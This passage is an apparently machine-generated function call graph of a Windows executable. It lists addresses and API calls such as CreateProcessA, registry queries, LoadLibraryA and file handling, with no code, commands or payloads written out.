18216->18218 18220 7ff764a15ff0 __scrt_get_show_window_mode 18217->18220 18218->18209 18219 7ff764a15f37 18219->18209 18219->18211 18221 7ff764a16016 CreateProcessA 18220->18221 18222 7ff764a1609f WaitForSingleObject 18221->18222 18223 7ff764a16055 18221->18223 18224 7ff764a160c9 18222->18224 18225 7ff764a160b3 GetExitCodeProcess 18222->18225 18752 7ff764a16728 18223->18752 18229 7ff764a16630 61 API calls 18224->18229 18227 7ff764a160c7 18225->18227 18228 7ff764a160d9 CloseHandle CloseHandle 18225->18228 18227->18228 18228->18194 18229->18227 18230 7ff764a16097 18230->18222 18231->18210 18231->18219 18233 7ff764a16658 wprintf 18232->18233 18234 7ff764a166e2 wprintf 18233->18234 18235 7ff764a16664 18233->18235 18236 7ff764a1ed08 wprintf 60 API calls 18234->18236 18237 7ff764a111b8 52 API calls 18235->18237 18238 7ff764a16702 wprintf 18236->18238 18239 7ff764a16697 18237->18239 18241 7ff764a14454 fwprintf 60 API calls 18238->18241 18240 7ff764a166bc MessageBoxA 18239->18240 18242 7ff764a166e0 18240->18242 18241->18242 18242->18017 18275 7ff764a28c8c 18243->18275 18246 7ff764a14cec 18247 7ff764a14d24 18246->18247 18255 7ff764a14d2f _handle_error __vcrt_freefls 18247->18255 18633 7ff764a14804 18247->18633 18249 7ff764a14d42 18249->18255 18638 7ff764a29e24 18249->18638 18251 7ff764a29e24 37 API calls 18252 7ff764a14d65 memcpy_s 18251->18252 18252->18251 18253 7ff764a14ebd 18252->18253 18252->18255 18254 7ff764a29e24 37 API calls 18253->18254 18253->18255 18254->18255 18255->18156 18257 7ff764a150e7 18256->18257 18259 7ff764a1512c __vcrt_freefls 18256->18259 18258 7ff764a29e24 37 API calls 18257->18258 18257->18259 18258->18259 18259->18160 18261 7ff764a28b38 18260->18261 18264 7ff764a28b4d 18260->18264 18263 7ff764a267fc wprintf 14 API calls 18261->18263 18262 7ff764a28ba9 18265 7ff764a267fc wprintf 14 API calls 18262->18265 18266 7ff764a28b3d 18263->18266 18264->18262 18267 7ff764a28b7c 18264->18267 18268 7ff764a28bae 18265->18268 18269 7ff764a2681c _get_daylight 14 API calls 18266->18269 18681 7ff764a28ab4 18267->18681 18271 7ff764a2681c _get_daylight 14 API calls 18268->18271 18272 7ff764a28b45 18269->18272 18273 7ff764a28bb6 18271->18273 18272->18154 18274 7ff764a2b480 _invalid_parameter_noinfo 23 API calls 18273->18274 18274->18272 18276 7ff764a28c97 18275->18276 18277 7ff764a28cb0 18275->18277 18279 7ff764a2681c _get_daylight 14 API calls 18276->18279 18287 7ff764a29388 18277->18287 18281 7ff764a28c9c 18279->18281 18283 7ff764a2b480 _invalid_parameter_noinfo 23 API calls 18281->18283 18282 7ff764a28d23 18285 7ff764a2681c _get_daylight 14 API calls 18282->18285 18286 7ff764a146b4 18282->18286 18283->18286 18285->18286 18286->18154 18286->18246 18288 7ff764a1d120 sscanf 26 API calls 18287->18288 18289 7ff764a293db 18288->18289 18292 7ff764a293eb 18289->18292 18299 7ff764a2b818 18289->18299 18302 7ff764a26918 18292->18302 18294 7ff764a29443 18296 7ff764a28ce6 18294->18296 18297 7ff764a2b560 __free_lconv_mon 14 API calls 18294->18297 18296->18282 18298 7ff764a2f830 LeaveCriticalSection 18296->18298 18297->18296 18300 7ff764a2b5a0 try_get_function 5 API calls 18299->18300 18301 7ff764a2b838 18300->18301 18301->18292 18303 7ff764a26941 18302->18303 18304 7ff764a26963 18302->18304 18307 7ff764a2b560 __free_lconv_mon 14 API calls 18303->18307 18318 7ff764a2694f 18303->18318 18305 7ff764a26967 18304->18305 18306 7ff764a269bc 18304->18306 18310 7ff764a2697b 18305->18310 18311 7ff764a26972 18305->18311 18305->18318 18308 7ff764a2dd4c sscanf MultiByteToWideChar 18306->18308 18307->18318 18309 7ff764a269d7 18308->18309 18313 7ff764a269de GetLastError 18309->18313 18317 7ff764a26a40 18309->18317 18321 7ff764a26a0b 18309->18321 18322 7ff764a26a02 18309->18322 18312 7ff764a2c044 wprintf 15 API calls 18310->18312 18314 7ff764a2b560 __free_lconv_mon 14 API calls 18311->18314 18315 7ff764a26988 18312->18315 18369 7ff764a267ac 18313->18369 18314->18310 18315->18318 18319 7ff764a2dd4c sscanf MultiByteToWideChar 18317->18319 18318->18294 18328 7ff764a294d4 18318->18328 18325 7ff764a26a5f 18319->18325 18320 7ff764a269eb 18326 7ff764a2681c _get_daylight 14 API calls 18320->18326 18324 7ff764a2c044 wprintf 15 API calls 18321->18324 18323 7ff764a2b560 __free_lconv_mon 14 API calls 18322->18323 18323->18321 18327 7ff764a26a17 18324->18327 18325->18313 18325->18318 18326->18318 18327->18317 18327->18318 18374 7ff764a29094 18328->18374 18331 7ff764a29549 18393 7ff764a267fc 18331->18393 18332 7ff764a29561 18396 7ff764a2f858 18332->18396 18341 7ff764a2681c _get_daylight 14 API calls 18364 7ff764a2955a 18341->18364 18364->18294 18370 7ff764a2cc68 _invalid_parameter_noinfo 14 API calls 18369->18370 18371 7ff764a267bd 18370->18371 18372 7ff764a2cc68 _invalid_parameter_noinfo 14 API calls 18371->18372 18373 7ff764a267d6 __free_lconv_mon 18372->18373 18373->18320 18375 7ff764a290c0 18374->18375 18383 7ff764a290da 18374->18383 18376 7ff764a2681c _get_daylight 14 API calls 18375->18376 18375->18383 18377 7ff764a290cf 18376->18377 18378 7ff764a2b480 _invalid_parameter_noinfo 23 API calls 18377->18378 18378->18383 18379 7ff764a291ae 18390 7ff764a2920a 18379->18390 18482 7ff764a280f8 18379->18482 18380 7ff764a2915a 18380->18379 18382 7ff764a2681c _get_daylight 14 API calls 18380->18382 18385 7ff764a291a3 18382->18385 18383->18380 18386 7ff764a2681c _get_daylight 14 API calls 18383->18386 18387 7ff764a2b480 _invalid_parameter_noinfo 23 API calls 18385->18387 18388 7ff764a2914f 18386->18388 18387->18379 18389 7ff764a2b480 _invalid_parameter_noinfo 23 API calls 18388->18389 18389->18380 18390->18331 18390->18332 18391 7ff764a2b4a0 _isindst 9 API calls 18392 7ff764a2929d 18391->18392 18394 7ff764a2cc68 _invalid_parameter_noinfo 14 API calls 18393->18394 18395 7ff764a26805 18394->18395 18395->18341 18488 7ff764a2f528 EnterCriticalSection 18396->18488 18483 7ff764a28111 18482->18483 18484 7ff764a28101 18482->18484 18483->18390 18483->18391 18485 7ff764a2681c _get_daylight 14 API calls 18484->18485 18486 7ff764a28106 18485->18486 18487 7ff764a2b480 _invalid_parameter_noinfo 23 API calls 18486->18487 18487->18483 18667 7ff764a14abc 18633->18667 18635 7ff764a148cc _handle_error 18635->18249 18636 7ff764a14836 18636->18635 18637 7ff764a29e24 37 API calls 18636->18637 18637->18635 18639 7ff764a29e4e 18638->18639 18640 7ff764a29e66 18638->18640 18641 7ff764a267fc wprintf 14 API calls 18639->18641 18642 7ff764a29f08 18640->18642 18647 7ff764a29e9e 18640->18647 18644 7ff764a29e53 18641->18644 18643 7ff764a267fc wprintf 14 API calls 18642->18643 18645 7ff764a29f0d 18643->18645 18646 7ff764a2681c _get_daylight 14 API calls 18644->18646 18648 7ff764a2681c _get_daylight 14 API calls 18645->18648 18649 7ff764a29e5b 18646->18649 18650 7ff764a29ea7 18647->18650 18651 7ff764a29ebc 18647->18651 18653 7ff764a29eb4 18648->18653 18649->18252 18654 7ff764a267fc wprintf 14 API calls 18650->18654 18680 7ff764a2f748 EnterCriticalSection 18651->18680 18660 7ff764a2b480 _invalid_parameter_noinfo 23 API calls 18653->18660 18656 7ff764a29eac 18654->18656 18657 7ff764a2681c _get_daylight 14 API calls 18656->18657 18657->18653 18660->18649 18668 7ff764a14aed 18667->18668 18669 7ff764a29e24 37 API calls 18668->18669 18671 7ff764a14b4e memcpy_s __vcrt_freefls 18668->18671 18670 7ff764a14b07 18669->18670 18670->18671 18672 7ff764a14b35 18670->18672 18674 7ff764a14b59 18670->18674 18671->18636 18672->18671 18676 7ff764a14c6c 18672->18676 18674->18671 18675 7ff764a29e24 37 API calls 18674->18675 18675->18671 18677 7ff764a14c8c 18676->18677 18678 7ff764a14ca4 18677->18678 18679 7ff764a29e24 37 API calls 18677->18679 18678->18671 18679->18678 18691 7ff764a2f748 EnterCriticalSection 18681->18691 18693 7ff764a1127c 52 API calls 18692->18693 18694 7ff764a17279 18693->18694 18695 7ff764a1127c 52 API calls 18694->18695 18696 7ff764a17284 18695->18696 18698 7ff764a1733b 18696->18698 18699 7ff764a175cc 18696->18699 18698->18181 18704 7ff764a1761c 18699->18704 18702 7ff764a175f7 18702->18696 18703 7ff764a1761c 29 API calls 18703->18702 18707 7ff764a17637 18704->18707 18705 7ff764a175e6 18705->18702 18705->18703 18707->18705 18708 7ff764a278d0 18707->18708 18709 7ff764a2790a 18708->18709 18714 7ff764a278e9 18708->18714 18710 7ff764a2caec sscanf 26 API calls 18709->18710 18711 7ff764a2790f 18710->18711 18712 7ff764a2cd94 sscanf 26 API calls 18711->18712 18713 7ff764a27928 18712->18713 18713->18714 18717 7ff764a30dcc 18713->18717 18714->18707 18716 7ff764a2795e 18716->18707 18718 7ff764a1d120 sscanf 26 API calls 18717->18718 18720 7ff764a30e05 18718->18720 18719 7ff764a30e11 _handle_error 18719->18716 18720->18719 18721 7ff764a32900 sscanf 29 API calls 18720->18721 18721->18719 18723 7ff764a1127c 52 API calls 18722->18723 18724 7ff764a17391 18723->18724 18725 7ff764a1127c 52 API calls 18724->18725 18727 7ff764a1739c 18725->18727 18726 7ff764a175cc 29 API calls 18726->18727 18727->18726 18728 7ff764a17423 18727->18728 18728->18187 18729->18193 18734 7ff764a2a398 18730->18734 18736 7ff764a2a427 18730->18736 18731 7ff764a2a3f6 18733 7ff764a2681c _get_daylight 14 API calls 18731->18733 18732 7ff764a2a451 18735 7ff764a2681c _get_daylight 14 API calls 18732->18735 18737 7ff764a2a3fb 18733->18737 18734->18203 18734->18730 18734->18731 18743 7ff764a2a3a3 18734->18743 18739 7ff764a2a456 18735->18739 18736->18732 18740 7ff764a2a476 18736->18740 18738 7ff764a2b480 _invalid_parameter_noinfo 23 API calls 18737->18738 18741 7ff764a2a406 18738->18741 18742 7ff764a2b480 _invalid_parameter_noinfo 23 API calls 18739->18742 18744 7ff764a1d120 sscanf 26 API calls 18740->18744 18745 7ff764a2a461 18740->18745 18741->18203 18742->18745 18743->18203 18744->18745 18745->18203 18747 7ff764a27096 18746->18747 18749 7ff764a2709d 18746->18749 18770 7ff764a26f58 18747->18770 18750 7ff764a2709b 18749->18750 18773 7ff764a26f18 18749->18773 18750->18214 18753 7ff764a2681c _get_daylight 14 API calls 18752->18753 18754 7ff764a16751 GetLastError 18753->18754 18755 7ff764a16769 FormatMessageA 18754->18755 18756 7ff764a167db 18754->18756 18758 7ff764a1679c wprintf 18755->18758 18789 7ff764a2683c 18756->18789 18759 7ff764a167fb 18758->18759 18760 7ff764a168a3 wprintf 18758->18760 18762 7ff764a111b8 52 API calls 18759->18762 18801 7ff764a1ed08 18760->18801 18766 7ff764a16842 18762->18766 18763 7ff764a168f3 18763->18230 18764 7ff764a168c7 wprintf 18764->18763 18810 7ff764a14454 18764->18810 18765 7ff764a1687c MessageBoxA 18769 7ff764a1689c 18765->18769 18766->18765 18768 7ff764a168e9 LocalFree 18768->18763 18769->18763 18769->18768 18780 7ff764a26e38 18770->18780 18788 7ff764a1cc38 EnterCriticalSection 18773->18788 18787 7ff764a2f528 EnterCriticalSection 18780->18787 18790 7ff764a2cc68 _invalid_parameter_noinfo 14 API calls 18789->18790 18791 7ff764a2684e 18790->18791 18792 7ff764a26856 18791->18792 18793 7ff764a2b4e8 _invalid_parameter_noinfo 14 API calls 18791->18793 18796 7ff764a26889 18791->18796 18792->18758 18794 7ff764a2687e 18793->18794 18795 7ff764a2b560 __free_lconv_mon 14 API calls 18794->18795 18795->18796 18796->18792 18814 7ff764a30ee8 18796->18814 18799 7ff764a2b4a0 _isindst 9 API calls 18800 7ff764a26917 18799->18800 18802 7ff764a1ed2e 18801->18802 18803 7ff764a1ed43 18801->18803 18804 7ff764a2681c _get_daylight 14 API calls 18802->18804 18803->18802 18805 7ff764a1ed48 18803->18805 18806 7ff764a1ed33 18804->18806 18823 7ff764a1cc50 18805->18823 18809 7ff764a2b480 _invalid_parameter_noinfo 23 API calls 18806->18809 18808 7ff764a1ed3e 18808->18764 18809->18808 18811 7ff764a14479 wprintf 18810->18811 18812 7ff764a1ed08 wprintf 60 API calls 18811->18812 18813 7ff764a1448f 18812->18813 18813->18768 18819 7ff764a30f00 18814->18819 18815 7ff764a30f05 18816 7ff764a268f5 18815->18816 18817 7ff764a2681c _get_daylight 14 API calls 18815->18817 18816->18792 18816->18799 18818 7ff764a30f0f 18817->18818 18820 7ff764a2b480 _invalid_parameter_noinfo 23 API calls 18818->18820 18819->18815 18819->18816 18821 7ff764a30f4a 18819->18821 18820->18816 18821->18816 18822 7ff764a2681c _get_daylight 14 API calls 18821->18822 18822->18818 18830 7ff764a1cc38 EnterCriticalSection 18823->18830 18910 7ff764a1618c GetModuleFileNameA 18831->18910 18834 7ff764a1624c 18837 7ff764a277cc 47 API calls 18834->18837 18846 7ff764a162c7 18834->18846 18835 7ff764a162f7 18836 7ff764a162fb 18835->18836 18847 7ff764a162cb 18835->18847 18838 7ff764a16630 61 API calls 18836->18838 18840 7ff764a1627c 18837->18840 18844 7ff764a1629d _handle_error 18838->18844 18839 7ff764a112a8 60 API calls 18839->18844 18841 7ff764a1629f 18840->18841 18842 7ff764a16291 18840->18842 18840->18847 18845 7ff764a277cc 47 API calls 18841->18845 18843 7ff764a112a8 60 API calls 18842->18843 18843->18844 18844->18021 18845->18846 18846->18847 18912 7ff764a1637c RegOpenKeyExA 18846->18912 18847->18839 18849 7ff764a134d9 18848->18849 18850 7ff764a134e2 18849->18850 18851 7ff764a15660 2 API calls 18849->18851 18946 7ff764a1fdf4 18850->18946 18851->18850 18854 7ff764a13505 18856 7ff764a16630 61 API calls 18854->18856 18860 7ff764a1350d _handle_error 18854->18860 18857 7ff764a138bb 18856->18857 18858 7ff764a1383b 18980 7ff764a1fc00 18858->18980 18860->18024 18861 7ff764a1fd30 39 API calls 18871 7ff764a13527 memcpy_s 18861->18871 18862 7ff764a13843 18862->18860 18864 7ff764a15660 2 API calls 18862->18864 18863 7ff764a111b8 52 API calls 18863->18871 18865 7ff764a13857 18864->18865 18868 7ff764a1115c wprintf 60 API calls 18865->18868 18866 7ff764a138a6 18992 7ff764a1aa34 18866->18992 18868->18860 18869 7ff764a1127c 52 API calls 18869->18871 18870 7ff764a112a8 60 API calls 18870->18871 18871->18858 18871->18861 18871->18863 18871->18866 18871->18869 18871->18870 18872 7ff764a16630 61 API calls 18871->18872 18872->18871 18874 7ff764a1195a 18873->18874 18875 7ff764a111b8 52 API calls 18874->18875 18884 7ff764a11972 18875->18884 18876 7ff764a11b29 18877 7ff764a112a8 60 API calls 18876->18877 18882 7ff764a11b5b 18877->18882 18878 7ff764a11bb0 18879 7ff764a11bef 18878->18879 18880 7ff764a11bc1 18878->18880 18879->18882 18883 7ff764a16630 61 API calls 18879->18883 18880->18882 18885 7ff764a16630 61 API calls 18880->18885 18881 7ff764a11b60 18881->18878 18881->18882 18886 7ff764a11bcf 18881->18886 18889 7ff764a11bd6 18881->18889 18882->18034 18883->18882 18884->18876 18884->18881 18890 7ff764a11c7a __scrt_get_show_window_mode 18885->18890 18886->18882 18888 7ff764a16630 61 API calls 18886->18888 18887 7ff764a16630 61 API calls 18887->18880 18888->18889 18889->18882 18889->18887 19048 7ff764a154b4 18890->19048 18894 7ff764a277e9 18893->18894 18895 7ff764a277f5 18893->18895 18896 7ff764a270f0 44 API calls 18894->18896 18897 7ff764a1d120 sscanf 26 API calls 18895->18897 18906 7ff764a15b19 18896->18906 18898 7ff764a2781d 18897->18898 18899 7ff764a2b818 5 API calls 18898->18899 18900 7ff764a2782d 18898->18900 18899->18900 18901 7ff764a26918 17 API calls 18900->18901 18902 7ff764a27881 18901->18902 18903 7ff764a27899 18902->18903 18905 7ff764a27885 18902->18905 19205 7ff764a270f0 18903->19205 18905->18906 18907 7ff764a2b560 __free_lconv_mon 14 API calls 18905->18907 18906->18036 18906->18041 18907->18906 18909 7ff764a2b560 __free_lconv_mon 14 API calls 18909->18906 18911 7ff764a161b0 wprintf 18910->18911 18911->18834 18913 7ff764a163df 18912->18913 18914 7ff764a163f5 18912->18914 18915 7ff764a16630 61 API calls 18913->18915 18942 7ff764a16560 RegQueryValueExA 18914->18942 18920 7ff764a163ee _handle_error 18915->18920 18918 7ff764a16415 18919 7ff764a16630 61 API calls 18918->18919 18921 7ff764a16424 RegCloseKey 18919->18921 18920->18835 18921->18920 18922 7ff764a16431 18923 7ff764a16447 18922->18923 18924 7ff764a16465 RegOpenKeyExA 18922->18924 18931 7ff764a16630 61 API calls 18923->18931 18925 7ff764a1648c 18924->18925 18926 7ff764a164a2 18924->18926 18928 7ff764a16630 61 API calls 18925->18928 18927 7ff764a16560 2 API calls 18926->18927 18930 7ff764a164b9 18927->18930 18929 7ff764a16463 18928->18929 18929->18921 18932 7ff764a164bd 18930->18932 18936 7ff764a164d3 18930->18936 18931->18929 18933 7ff764a16630 61 API calls 18932->18933 18934 7ff764a164d1 RegCloseKey RegCloseKey 18933->18934 18934->18920 18936->18934 18937 7ff764a16560 2 API calls 18936->18937 18938 7ff764a164f7 18937->18938 18939 7ff764a16507 18938->18939 18941 7ff764a1115c wprintf 60 API calls 18938->18941 18940 7ff764a1115c wprintf 60 API calls 18939->18940 18940->18934 18941->18939 18943 7ff764a16411 18942->18943 18944 7ff764a1659e 18942->18944 18943->18918 18943->18922 18944->18943 18945 7ff764a165ab RegQueryValueExA 18944->18945 18945->18943 18948 7ff764a1fd38 18946->18948 18947 7ff764a1fd55 18949 7ff764a2681c _get_daylight 14 API calls 18947->18949 18948->18947 18950 7ff764a1fd81 18948->18950 18951 7ff764a1fd5a 18949->18951 18952 7ff764a1fd93 18950->18952 18953 7ff764a1fd86 18950->18953 18954 7ff764a2b480 _invalid_parameter_noinfo 23 API calls 18951->18954 18995 7ff764a30824 18952->18995 18956 7ff764a2681c _get_daylight 14 API calls 18953->18956 18955 7ff764a134fd 18954->18955 18955->18854 18965 7ff764a1fd30 18955->18965 18956->18955 18968 7ff764a1fc64 18965->18968 18966 7ff764a1fc8e 18967 7ff764a2681c _get_daylight 14 API calls 18966->18967 18969 7ff764a1fc93 18967->18969 18968->18966 18970 7ff764a1fcbc 18968->18970 18971 7ff764a2b480 _invalid_parameter_noinfo 23 API calls 18969->18971 18976 7ff764a1fc9e 18970->18976 19036 7ff764a1cc38 EnterCriticalSection 18970->19036 18971->18976 18976->18871 18981 7ff764a1fc17 18980->18981 18982 7ff764a1fc35 18980->18982 18983 7ff764a2681c _get_daylight 14 API calls 18981->18983 18984 7ff764a1fc27 18982->18984 19037 7ff764a1cc38 EnterCriticalSection 18982->19037 18985 7ff764a1fc1c 18983->18985 18984->18862 18987 7ff764a2b480 _invalid_parameter_noinfo 23 API calls 18985->18987 18987->18984 19038 7ff764a1aa48 IsProcessorFeaturePresent 18992->19038 19008 7ff764a2f528 EnterCriticalSection 18995->19008 19039 7ff764a1aa5f 19038->19039 19044 7ff764a1aae4 RtlCaptureContext RtlLookupFunctionEntry 19039->19044 19045 7ff764a1ab14 RtlVirtualUnwind 19044->19045 19046 7ff764a1aa73 19044->19046 19045->19046 19047 7ff764a1a92c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 19046->19047 19063 7ff764a26cbc 19048->19063 19051 7ff764a26cbc 28 API calls 19054 7ff764a15518 19051->19054 19052 7ff764a155d2 19053 7ff764a155d7 WaitForSingleObject GetExitCodeThread CloseHandle 19052->19053 19055 7ff764a11d23 19052->19055 19053->19055 19054->19052 19057 7ff764a15548 19054->19057 19081 7ff764a289e4 19054->19081 19055->18034 19058 7ff764a289e4 26 API calls 19057->19058 19060 7ff764a15575 19057->19060 19058->19060 19059 7ff764a155ac 19059->19052 19096 7ff764a1533c 19059->19096 19060->19052 19060->19059 19061 7ff764a289e4 26 API calls 19060->19061 19061->19059 19064 7ff764a26cec 19063->19064 19065 7ff764a26cd5 19063->19065 19132 7ff764a26c5c 19064->19132 19066 7ff764a2681c _get_daylight 14 API calls 19065->19066 19068 7ff764a26cda 19066->19068 19070 7ff764a2b480 _invalid_parameter_noinfo 23 API calls 19068->19070 19074 7ff764a154f3 19070->19074 19071 7ff764a26cff CreateThread 19072 7ff764a26d3c 19071->19072 19073 7ff764a26d2f GetLastError 19071->19073 19072->19074 19076 7ff764a26d4c CloseHandle 19072->19076 19077 7ff764a26d52 19072->19077 19075 7ff764a267ac wprintf 14 API calls 19073->19075 19074->19051 19074->19054 19075->19072 19076->19077 19078 7ff764a26d5b FreeLibrary 19077->19078 19079 7ff764a26d61 19077->19079 19078->19079 19080 7ff764a2b560 __free_lconv_mon 14 API calls 19079->19080 19080->19074 19082 7ff764a28a1e 19081->19082 19083 7ff764a289f1 19081->19083 19085 7ff764a28a41 19082->19085 19087 7ff764a28a5d 19082->19087 19084 7ff764a2681c _get_daylight 14 API calls 19083->19084 19093 7ff764a289a8 19083->19093 19088 7ff764a289fb 19084->19088 19086 7ff764a2681c _get_daylight 14 API calls 19085->19086 19089 7ff764a28a46 19086->19089 19090 7ff764a1d120 sscanf 26 API calls 19087->19090 19091 7ff764a2b480 _invalid_parameter_noinfo 23 API calls 19088->19091 19092 7ff764a2b480 _invalid_parameter_noinfo 23 API calls 19089->19092 19094 7ff764a28a51 19090->19094 19095 7ff764a28a06 19091->19095 19092->19094 19093->19057 19094->19057 19095->19057 19097 7ff764a15377 19096->19097 19098 7ff764a153c5 GetProcAddress 19096->19098 19100 7ff764a16220 88 API calls 19097->19100 19099 7ff764a153d3 _handle_error 19098->19099 19099->19052 19102 7ff764a15388 19100->19102 19101 7ff764a153b9 19101->19098 19101->19099 19102->19101 19103 7ff764a1540c 19102->19103 19104 7ff764a153ad 19102->19104 19139 7ff764a16aa0 19103->19139 19105 7ff764a16630 61 API calls 19104->19105 19105->19101 19107 7ff764a15411 19108 7ff764a15422 LoadLibraryA 19107->19108 19108->19101 19109 7ff764a15432 19108->19109 19110 7ff764a15437 19109->19110 19111 7ff764a154ae 19109->19111 19113 7ff764a1544d LoadLibraryA 19110->19113 19112 7ff764a1aa34 8 API calls 19111->19112 19114 7ff764a154b3 19112->19114 19113->19101 19115 7ff764a15461 19113->19115 19116 7ff764a26cbc 28 API calls 19114->19116 19118 7ff764a15477 LoadLibraryA 19115->19118 19117 7ff764a154f3 19116->19117 19120 7ff764a26cbc 28 API calls 19117->19120 19123 7ff764a15518 19117->19123 19118->19099 19119 7ff764a15492 GetProcAddress 19118->19119 19119->19101 19120->19123 19121 7ff764a155d2 19122 7ff764a155d7 WaitForSingleObject GetExitCodeThread CloseHandle 19121->19122 19124 7ff764a155fc 19121->19124 19122->19124 19123->19121 19125 7ff764a289e4 26 API calls 19123->19125 19126 7ff764a15548 19123->19126 19124->19052 19125->19126 19127 7ff764a289e4 26 API calls 19126->19127 19129 7ff764a15575 19126->19129 19127->19129 19128 7ff764a155ac 19128->19121 19131 7ff764a1533c 106 API calls 19128->19131 19129->19121 19129->19128 19130 7ff764a289e4 26 API calls 19129->19130 19130->19128 19131->19121 19133 7ff764a2b4e8 _invalid_parameter_noinfo 14 API calls 19132->19133 19134 7ff764a26c7e 19133->19134 19135 7ff764a2b560 __free_lconv_mon 14 API calls 19134->19135 19136 7ff764a26c88 19135->19136 19137 7ff764a26ca9 19136->19137 19138 7ff764a26c8f GetModuleHandleExW 19136->19138 19137->19071 19137->19072 19138->19137 19140 7ff764a16ad2 19139->19140 19142 7ff764a16c3b _handle_error 19139->19142 19141 7ff764a16220 88 API calls 19140->19141 19148 7ff764a16ae3 19141->19148 19142->19107 19143 7ff764a16b61 19144 7ff764a16220 88 API calls 19143->19144 19152 7ff764a16b6d 19144->19152 19145 7ff764a16beb 19146 7ff764a16220 88 API calls 19145->19146 19151 7ff764a16bf7 19146->19151 19147 7ff764a16c2f 19149 7ff764a16630 61 API calls 19147->19149 19148->19143 19148->19147 19150 7ff764a112a8 60 API calls 19148->19150 19149->19142 19153 7ff764a16b3d 19150->19153 19151->19142 19151->19147 19155 7ff764a16c3f 19151->19155 19152->19145 19152->19147 19156 7ff764a112a8 60 API calls 19152->19156 19170 7ff764a26a90 19153->19170 19164 7ff764a112a8 60 API calls 19155->19164 19158 7ff764a16bc7 19156->19158 19160 7ff764a26a90 31 API calls 19158->19160 19159 7ff764a16b4d LoadLibraryA 19159->19143 19161 7ff764a16c81 19159->19161 19163 7ff764a16bd3 19160->19163 19162 7ff764a16630 61 API calls 19161->19162 19162->19142 19163->19145 19166 7ff764a16bd7 LoadLibraryA 19163->19166 19165 7ff764a16c61 19164->19165 19167 7ff764a26a90 31 API calls 19165->19167 19166->19145 19166->19161 19168 7ff764a16c6d 19167->19168 19168->19142 19169 7ff764a16c71 LoadLibraryA 19168->19169 19169->19142 19169->19161 19173 7ff764a26aa4 19170->19173 19174 7ff764a26aca 19173->19174 19175 7ff764a26ac0 19173->19175 19177 7ff764a1d120 sscanf 26 API calls 19174->19177 19187 7ff764a30fbc 19175->19187 19178 7ff764a26af2 19177->19178 19179 7ff764a26b02 19178->19179 19180 7ff764a2b818 5 API calls 19178->19180 19181 7ff764a26918 17 API calls 19179->19181 19180->19179 19182 7ff764a26b56 19181->19182 19183 7ff764a26b5a 19182->19183 19184 7ff764a30fbc 25 API calls 19182->19184 19185 7ff764a16b49 19183->19185 19186 7ff764a2b560 __free_lconv_mon 14 API calls 19183->19186 19184->19183 19185->19143 19185->19159 19186->19185 19188 7ff764a30fd8 19187->19188 19189 7ff764a30ff5 19187->19189 19191 7ff764a267fc wprintf 14 API calls 19188->19191 19189->19188 19190 7ff764a30ffd GetFileAttributesExW 19189->19190 19193 7ff764a3100e GetLastError 19190->19193 19199 7ff764a31024 19190->19199 19192 7ff764a30fdd 19191->19192 19194 7ff764a2681c _get_daylight 14 API calls 19192->19194 19195 7ff764a267ac wprintf 14 API calls 19193->19195 19196 7ff764a30fe5 19194->19196 19204 7ff764a3101b 19195->19204 19197 7ff764a2b480 _invalid_parameter_noinfo 23 API calls 19196->19197 19201 7ff764a30ff1 _handle_error 19197->19201 19198 7ff764a2681c _get_daylight 14 API calls 19198->19201 19200 7ff764a267fc wprintf 14 API calls 19199->19200 19199->19201 19202 7ff764a3103e 19200->19202 19201->19185 19203 7ff764a2681c _get_daylight 14 API calls 19202->19203 19203->19204 19204->19198 19206 7ff764a2712b 19205->19206 19207 7ff764a2710f 19205->19207 19206->19207 19209 7ff764a2713e CreateFileW 19206->19209 19208 7ff764a267fc wprintf 14 API calls 19207->19208 19210 7ff764a27114 19208->19210 19211 7ff764a271b8 19209->19211 19212 7ff764a27171 19209->19212 19214 7ff764a2681c _get_daylight 14 API calls 19210->19214 19253 7ff764a276c0 19211->19253 19229 7ff764a2723c GetFileType 19212->19229 19217 7ff764a2711b 19214->19217 19216 7ff764a271bd 19219 7ff764a271cd 19216->19219 19220 7ff764a271c1 19216->19220 19221 7ff764a2b480 _invalid_parameter_noinfo 23 API calls 19217->19221 19218 7ff764a2717f 19222 7ff764a2719a CloseHandle 19218->19222 19223 7ff764a27126 19218->19223 19272 7ff764a2747c 19219->19272 19224 7ff764a267ac wprintf 14 API calls 19220->19224 19221->19223 19222->19223 19223->18906 19223->18909 19228 7ff764a271cb 19224->19228 19228->19218 19230 7ff764a27347 19229->19230 19231 7ff764a2728a 19229->19231 19233 7ff764a2734f 19230->19233 19234 7ff764a27371 19230->19234 19232 7ff764a272b6 GetFileInformationByHandle 19231->19232 19239 7ff764a275b8 16 API calls 19231->19239 19235 7ff764a272df 19232->19235 19236 7ff764a27362 GetLastError 19232->19236 19233->19236 19237 7ff764a27353 19233->19237 19238 7ff764a27394 PeekNamedPipe 19234->19238 19245 7ff764a27332 _handle_error 19234->19245 19240 7ff764a2747c 27 API calls 19235->19240 19242 7ff764a267ac wprintf 14 API calls 19236->19242 19241 7ff764a2681c _get_daylight 14 API calls 19237->19241 19238->19245 19243 7ff764a272a4 19239->19243 19244 7ff764a272ea 19240->19244 19241->19245 19242->19245 19243->19232 19243->19245 19289 7ff764a273e4 19244->19289 19245->19218 19247 7ff764a272f9 19248 7ff764a273e4 2 API calls 19247->19248 19249 7ff764a27309 19248->19249 19250 7ff764a273e4 2 API calls 19249->19250 19251 7ff764a2731a 19250->19251 19251->19245 19252 7ff764a2681c _get_daylight 14 API calls 19251->19252 19252->19245 19254 7ff764a276f6 19253->19254 19255 7ff764a2681c _get_daylight 14 API calls 19254->19255 19266 7ff764a27793 _handle_error __vcrt_freefls 19254->19266 19256 7ff764a2770a 19255->19256 19257 7ff764a2681c _get_daylight 14 API calls 19256->19257 19258 7ff764a27711 19257->19258 19294 7ff764a315d4 19258->19294 19260 7ff764a27727 19261 7ff764a27738 19260->19261 19262 7ff764a2772f 19260->19262 19264 7ff764a2681c _get_daylight 14 API calls 19261->19264 19263 7ff764a2681c _get_daylight 14 API calls 19262->19263 19271 7ff764a27734 19263->19271 19265 7ff764a2773d 19264->19265 19265->19266 19267 7ff764a2681c _get_daylight 14 API calls 19265->19267 19266->19216 19268 7ff764a27747 19267->19268 19269 7ff764a315d4 31 API calls 19268->19269 19269->19271 19270 7ff764a27781 GetDriveTypeW 19270->19266 19271->19266 19271->19270 19274 7ff764a274a4 19272->19274 19273 7ff764a271da 19282 7ff764a275b8 19273->19282 19274->19273 19380 7ff764a316fc 19274->19380 19276 7ff764a27538 19276->19273 19277 7ff764a316fc 27 API calls 19276->19277 19278 7ff764a2754b 19277->19278 19278->19273 19279 7ff764a316fc 27 API calls 